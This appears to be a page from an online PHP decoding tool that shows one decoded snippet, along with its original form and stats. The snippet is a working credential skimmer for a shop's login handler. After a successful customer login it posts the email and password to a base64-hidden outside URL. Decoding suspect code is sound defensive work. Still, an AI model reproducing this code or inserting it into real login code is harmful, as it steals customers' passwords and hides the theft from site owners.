Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if($this->customer->login($this->request->post['email'], $this->request->post['password'])..
Decoded Output download
<? if($this->customer->login($this->request->post['email'], $this->request->post['password'])){$smail=$this->request->post['email'].'|'.$this->request->post['password'];$curl2=curl_init();curl_setopt($curl2,CURLOPT_RETURNTRANSFER,1);curl_setopt($curl2,CURLOPT_URL,base64_decode('aHR0cDovL2FueXRoaW5ncHJvLm5ldC9nZXQyLnBocA=='));curl_setopt($curl2, CURLOPT_POST, 1);curl_setopt($curl2, CURLOPT_POSTFIELDS, 'maillogin='.urlencode($smail));curl_exec($curl2);curl_close($curl2);} ?>
Did this file decode correctly?
Original Code
if($this->customer->login($this->request->post['email'], $this->request->post['password'])){$smail=$this->request->post['email'].'|'.$this->request->post['password'];$curl2=curl_init();curl_setopt($curl2,CURLOPT_RETURNTRANSFER,1);curl_setopt($curl2,CURLOPT_URL,base64_decode('aHR0cDovL2FueXRoaW5ncHJvLm5ldC9nZXQyLnBocA=='));curl_setopt($curl2, CURLOPT_POST, 1);curl_setopt($curl2, CURLOPT_POSTFIELDS, 'maillogin='.urlencode($smail));curl_exec($curl2);curl_close($curl2);}
Function Calls
None |
Stats
MD5 | 1f6a7278dca90c62c1fbe9fa1994be1a |
Eval Count | 0 |
Decode Time | 88 ms |